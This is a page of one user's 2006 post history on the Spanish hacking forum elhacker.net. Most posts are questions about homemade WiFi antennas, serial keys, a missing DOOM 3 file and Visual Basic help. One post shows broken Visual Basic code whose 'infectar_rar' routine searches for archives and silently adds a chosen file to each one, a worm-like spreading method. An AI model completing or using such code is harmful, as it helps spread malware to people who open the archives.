elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7
41  Seguridad Informática / Materiales y equipos / Re: Antenas Caseras en: 31 Diciembre 2006, 15:25 pm
hola


que distancia viene a cojer bien echa?

saludos
42  Seguridad Informática / Materiales y equipos / Re: Antenas Caseras en: 31 Diciembre 2006, 14:32 pm
hoal

dispongo de un usb wifi adapter y un alargador de usb de 3 metros  con eso podria montar una antena que fuera buena? o me recomendais montar una de las otras


saludos[sh]
43  Seguridad Informática / Materiales y equipos / Re: Antenas Caseras en: 31 Diciembre 2006, 11:17 am
hola


y que otra antena me recomendarias hacer?(que sea buena)


saludos[sh]
44  Seguridad Informática / Materiales y equipos / Re: Antenas Caseras en: 30 Diciembre 2006, 23:37 pm
hola

cual pensais que es mejor antena:

patatas pringles, la de la tarrina de cds, o la de la paellera


saludos[sh]
45  Programación / Programación Visual Basic / Estaria bien este codigo? en: 12 Noviembre 2006, 22:21 pm
ola

Citar
Private Sub search_rar()
On Error Resume Next
Dim NombreRar As String
Dim rarExit As String
rarExit = FindFirstFile("*.zip", NombreRar)
infectar_rar NombreRar.cFileName
While FindNextFile(rarExit, NombreRar)
infectar_rar NombreRar.cFileName
End Sub

Function infectar_rar(NombreRar As String)
On Error Resume Next
Dim file_exe As String
Dim winrar As String
winrar = "C:\ARCHIVOS DE PROGRAMA\WINRAR\WinRAR.exe"
Shell winrar & " -a " & NombreRar & " " & text1.text, vbHide
End Function

Queria saber si asi esta bien montado el motor de busqueda para los .rar y luego la forma de usar los resultados.

saludos[sh]
46  Programación / Programación Visual Basic / Re: Sistema de seriales en: 29 Octubre 2006, 20:09 pm
ola

 :-\  :-(   no tneia ni idea de que fuera asi.  :-X

Si no te es mucha molestia podrias ponerme un ejemplo? que si no no se por donde empezar

saludos[sh]
47  Programación / Programación Visual Basic / Sistema de seriales en: 29 Octubre 2006, 17:43 pm
ola

 tengo una duda como podria ponerle a un programa mio un sistema de seriales que para instalarlo o usarlo necesitaras introducir un serial y ese serial solo valiera 1 vez?

saludos[sh]
48  Media / Juegos y Consolas / Error al instalar DOOM 3 falta un archivo en: 28 Octubre 2006, 10:17 am
ola

bueno pues el titulo lo dice todo,me falta el archivo pak000.pk4 algien lo tiene y lo podria subir o sabe donde bajarlo?.

saludos[sh]
49  Programación / Programación Visual Basic / Re: Ayuda con mi programa lo mas importante me falla :S en: 25 Octubre 2006, 19:59 pm
ola

WarGhost eso lo bloquearia si yo estubiera haciendo un explorador web,pero lo que yo necesito esque lo bloque en internet explorer y mozilla o en alguno de esos dos.

saludos[sh]
50  Programación / Programación Visual Basic / Re: Ayuda con mi programa lo mas importante me falla :S en: 25 Octubre 2006, 13:38 pm
ola

 ;D  me lo podrias explicar un poquito mas porfavor el uso de If lo comonozco pero el otro no  :huh:

saludos[sh]
Páginas: 1 2 3 4 [5] 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines